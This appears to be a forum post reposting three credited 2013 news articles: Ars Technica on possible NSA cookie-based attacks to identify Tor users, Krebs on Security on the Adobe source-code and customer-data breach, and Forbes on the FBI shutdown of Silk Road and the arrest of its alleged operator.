How the NSA might use Hotmail, Yahoo or other cookies to identify Tor users. "Quantum cookie" attacks are plausible but only in highly limited cases. One of the more intriguing revelations in the most recent leak of NSA documents is the prospect that the spy agency is using browser cookies from Yahoo, Hotmail or the Google-owned DoubleClick ad network to decloak users of the Tor anonymity service. One slide from a June 2012 presentation titled "Tor Stinks" carried the heading "Analytics: Cookie Leakage" followed by the words "DoubleclickID seen on Tor and nonTor IPs." The somewhat cryptic slide led to rampant speculation on Twitter and elsewhere that the NSA and its British counterpart, the Government Communications Headquarters (GCHQ), are able to bypass Tor protections by somehow manipulating the cookies Google uses to track people who have viewed DoubleClick ads. Principal volunteers with the Tor Project believe such a scenario is "plausible," but only in limited cases. Before explaining why, it helps to discuss how such an attack might work. As documented elsewhere in the "Tor Stinks" presentation, the spy agencies sometimes use secret servers that are located on the Internet backbone to redirect some targets to another set of secret servers that impersonate the websites the targets intended to visit. Given their privileged location, the secret backbone nodes, dubbed "Quantum," are able to respond to the requests faster than the intended server, allowing them to win a "race condition." Government spies can't track cookies within the Tor network, because traffic is encrypted during its circuitous route through three different relays. But if the spies can watch the Internet backbone, they may be able to grab or manipulate cookies once the data exits Tor and heads toward its final destination. A slide later in the deck refers to something called "QUANTUMCOOKIE," which purportedly "forces clients to divulge stored cookies." There are multiple ways to interpret such a vague bullet point. One of the more plausible is that the Quantum backbone servers can be used to serve cookies not just from DoubleClick or Google, but from Yahoo, Hotmail, or any other widely used Internet service. Significant constraints For dissidents of repressive governments, corporate or government whistleblowers, investigative journalists, and other Tor users, the prospect of being outed by a tracking cookie sounds scary. But based on the details included in the slides, it appears there are significant constraints on such attacks. For one thing, as a separate slide instructed: "Use cookies to identify Tor users when they are not using Tor." Bullet points immediately below read: Current: preliminary analysis shows that some cookies "survive" Tor use. Depends on how target is using Tor (Torbutton/Tor Browser Bundle clears out cookies). Goal: test with cookies associated with CT targets —Idea: what if we seeded cookies to a target? — Investigate Evercookie persistence "Torbutton" is a reference to a Firefox extension that Tor developers haven't used this way in almost 18 months. The feature allowed users to click a button to choose whether to funnel their traffic through the anonymous Tor network or over their regular Internet connection. By mid 2011, developers warned that the Torbutton could leak cookies or other data from regular Internet connections into Tor traffic, a behavior that could allow eavesdroppers to correlate users' public profiles or viewing history with Tor activities that were presumed private. The Torbutton's "toggle model" was formally purged from the Tor Browser Bundle in May 2012. The effect of this change, as well as additional improvements that more carefully deleted all cookies when the Tor Browser Bundle is closed, is that the described attacks using cookies from DoubleClick or other services are in most cases not possible. "The key point here is that it doesn't matter now if you can trick the browser into revealing its cookie anymore," Roger Dingledine, the lead Tor developer who often goes by the handle "arma," wrote in an e-mail to Ars. "Back when we used the 'toggle' model, you might have a cookie on your browser that was created when you were in 'not using Tor' mode. That cookie is really dangerous if they can get a hold of it while you're using Tor, because it links you to your 'non-Tor' identity. Now that the toggle model is gone, and Tor Browser is really good about clearing cookies when you close it, then tricking Tor Browser into telling you about its (temporary, session-only, only gotten over Tor) cookies is much less dangerous." One possible exception that Tor users should be aware of is the risk that comes when they log in to Hotmail, Gmail, or another service, even when running the most recent version of the Tor Browser Bundle. Until users log out and either close the browser or enable the "new identity" function, an attack mounted by a Quantum node might be able to redirect them to an imposter site that's able to retrieve a cookie set by the currently logged-in service. To recap, here's how a cookie-based attack might work against someone using the old Tor software, based on a scenario offered by Dingledine: Let's say there's a website, Latest news, sport and comment from the Guardian | The Guardian, and the adversary wants to learn the identities of users who visit it over Tor and ask for a certain document. Let's also suppose that the adversary can install their "Quantum" box on the Internet quite close to the Guardian webserver. And we have Alice, our anonymous Tor user who uses Firefox and Torbutton in the old "Tor enabled" mode. She clicks on the URL for her document, and her request is tunneled through the Tor network. Her Tor exit relay makes a Web request on her behalf to the Guardian website, but Quantum sees the Web request and answers it before the real Guardian website can answer. Quantum's answer consists of an http redirect that makes Alice's browser think the website has asked her to load Hotmail and Yahoo. So she does, over Tor. But in the old toggle model, what if she still had some old cookies lying around, back from when she had Tor disabled and was browsing normally? If she's a Yahoo user or a Hotmail user, then when her browser connects to those sites it will happily send her login cookie. The adversary then goes to whichever one(s) worked and asks them for subscriber information about the user they originally gave that login cookie to. Bad news for Alice. Still a lot of work to do Bottom line: nothing in the slides suggests that the cookie attacks threaten Tor users who run up-to-date software and follow best-practice advice repeatedly offered by Tor volunteers. Of course, it's possible the NSA and GCHQ have techniques. Chief among them is the use of Quantum servers to redirect Tor users to sites that exploit security vulnerabilities to surreptitiously install malware on their computers. Such attacks have long been recognized as a risk, but they come at a cost to spy agencies since success requires the availability of a vulnerability in a current version of the software that can be exploited with no indication to the end user. That requirement makes it harder for agents to carry out the attacks against large numbers of targets. "Looking over the rest of the slides, they seem to be asking some of the right questions, but they don't seem to have any more answers than we do in the academic research community—and in many cases the papers at Free Haven's Selected Papers in Anonymity provide significantly better answers than these slides do," Dingledine wrote. "Or said more clearly, we still have a lot of work to do to make Tor both safe and usable, but we don't have any new work based on these slides." sursa: How the NSA might use Hotmail, Yahoo or other cookies to identify Tor users | Ars Technica

Adobe Systems Inc. is expected to announce today that hackers broke into its network and stole source code for an as-yet undetermined number of software titles, including its ColdFusion Web application platform, and possibly its Acrobat family of products. The company said hackers also accessed nearly three million customer credit card records, and stole login data for an undetermined number of Adobe user accounts. KrebsOnSecurity first became aware of the source code leak roughly one week ago, when this author — working in conjunction with fellow researcher Alex Holden, CISO of Hold Security LLC — discovered a massive 40 GB source code trove stashed on a server used by the same cyber criminals believed to have hacked into major data aggregators earlier this year, including LexisNexis, Dun & Bradstreet and Kroll. The hacking team’s server contained huge repositories of uncompiled and compiled code that appeared to be source code for ColdFusion and Adobe Acrobat. Shortly after that discovery, KrebsOnSecurity shared several screen shots of the code repositories with Adobe. Today, Adobe responded with confirmation that it has been working on an investigation into a potentially broad-ranging breach into its networks since Sept. 17, 2013. In an interview with this publication earlier today, Adobe confirmed that the company believes that hackers accessed a source code repository sometime in mid-August 2013, after breaking into a portion of Adobe’s network that handled credit card transactions for customers. Adobe believes the attackers stole credit card and other data on approximately 2.9 million customers, and that the bad guys also accessed an as-yet-undetermined number of user names and passwords that customers use to access various parts of the Adobe customer network. Adobe said the credit card numbers were encrypted and that the company does not believe decrypted credit card numbers left its network. Nevertheless, the company said that later today it will begin the process of notifying affected customers — which include many Revel and Creative Cloud account users — via email that they need to reset their passwords. In an interview prior to sending out a news alert on the company’s findings, Adobe’s Chief Security Officer Brad Arkin said the information shared by this publication “helped steer our investigation in a new direction.” Arkin said the company has undertaken a rigorous review of the ColdFusion code shipped since the code archive was compromised, and that it is confident that the source code for ColdFusion code that shipped following the incident “maintained its integrity.” “We are in the early days of what we expect will be an extremely long and thorough response to this incident,” Arkin said. The company is expected to publish an official statement this afternoon outlining the broad points of its investigation so far. Arkin said Adobe is still in the process of determining what source code for other products may have been accessed by the attackers, and conceded that Adobe Acrobat may have been among the products the bad guys touched. Indeed, one of the screen shots this publication shared with Adobe indicates that the attackers also had access to Acrobat code, including what appears to be code for as-yet unreleased Acrobat components (see screen grab above). “We’re still at the brainstorming phase to come up with ways to provide higher level of assurance for the integrity of our products, and that’s going to be a key part of our response,” Arkin said. He noted that the company was in the process of looking for anomalous check-in activity on its code repositories and for other things that might seem out of place. “We are looking at malware analysis and exploring the different digital assets we have. Right now the investigation is really into the trail of breadcrumbs of where the bad guys touched.” The revelations come just two days after KrebsOnSecurity published a story indicating that the same attackers apparently responsible for this breach were also involved in the intrusions into the networks of the National White Collar Crime Center (NW3C), a congressionally-funded non-profit organization that provides training, investigative support and research to agencies and entities involved in the prevention, investigation and prosecution of cybercrime. As noted in that story, the attackers appear to have initiated the intrusion into the NW3C using a set of attack tools that leveraged security vulnerabilities in Adobe’s ColdFusion Web application server. While Adobe many months ago issued security updates to plug all of the ColdFusion vulnerabilities used by the attackers, many networks apparently run outdated versions of the software, leaving them vulnerable to compromise. This indeed may have also been the vector that attackers used to infiltrate Adobe’s own networks; Arkin said the company has not yet determined whether the servers that were breached were running ColdFusion, but acknowledged that the attackers appear to have gotten their foot in the door through “some type of out-of-date” software. Stay tuned for further updates on this rapidly-moving story. Update 4:38 p.m. ET: Adobe has released a statement about these incidents here and here. A separate customer security alert for users affected by this breach is here. Also, in a hopefully unrelated announcement, Adobe says it will be releasing critical security updates next Tuesday for Adobe Acrobat and Adobe Reader. sursa: Adobe To Announce Source Code, Customer Data Breach — Krebs on Security pe acelasi subiect: http://www.itworld.com/security/377077/hackers-steal-information-29-million-adobe-customers http://www.darkreading.com/attacks-breaches/adobe-hacked-source-code-customer-data-s/240162228

Even during a federal government shutdown, drug pirates aren’t safe. Popular online black market Silk Road has been shut down by the Federal Bureau of Investigation and an individual alleged to be its infamous owner, ‘Dread Pirate Roberts,’ has been arrested, according to a Federal Bureau of Investigation complaint. Krebs on Security uploaded a photo of Silk Road apparently shut down by an FBI raid and has since published the full government complaint. It alleges that Ross William Ulbricht, a San Francisco resident, is the mastermind behind the Silk Road, and the ‘DPR’ behind its booming marketplace of activity for narcotics and other illicit goods, the most famous use of the open-source electronic money known as Bitcoin. The FBI calls Silk Road in the complaint “the most sophisticated and extensive criminal marketplace on the Internet today,” used by several thousand drug dealers and with revenue of over 9.5 million Bitcoins to date, which the FBI approximates as worth $1.2 billion in sales. (Bitcoin values fluctuate widely over time, making any comparison difficult.) Ulbricht has been charged with one count of narcotics trafficking conspiracy, computer hacking conspiracy and money laundering conspiracy. The full complaint linked to above is worth a read, but it appears that agents found Ulbricht after Canadian border authorities routinely checked a package intended for his San Francisco home and discovered nine fake identification cards within, which Ulbricht allegedly was seeking to obtain to rent more servers to power Silk Road as it massively expanded. The man behind Silk Road’s commission on the activity, the FBI alleges, has totaled 600,000 Bitcoins, or about $80 million by its own conversions. For the best account to date of the Dread Pirate Robert’s life, formerly behind the scenes, check FORBES’ cover story, “The Man Behind Booming Black Market Drug Website Silk Road.” In the story, DPR, or Ulbricht as the FBI now claims, told Andy Greenberg he couldn’t communicate outside of the underground anonymous Tor software system through which he operated Silk Road, noting: “The highest levels of government are hunting me, I can’t take any chances.” In a separate interview, DPR told Greenberg that he hadn’t started Silk Road but had taken over for Silk Road’s true founder, who was “well compensated” for the switch and remained active. The name ‘Dread Pirate Roberts’ is a reference to the character from the movie ‘Princess Bride,’ who also mentions having predecessors by the same name. If DPR’s claim to Greenberg is true that he was not the first administrator on the site, it’s possible that the government’s manhunt is not over. It appears that looking to purchase identification may have been that unnecessary chance that has put an end to the current DPR’s run, but there were other holes in the system. FORBES also purchased marijuana over the Silk Road market and found its purchases could be traced. Keep an eye for updates to this story. Sursa: Feds Shut Down Silk Road Black Market, Owner Known As 'Dread Pirate Roberts' Arrested - Forbes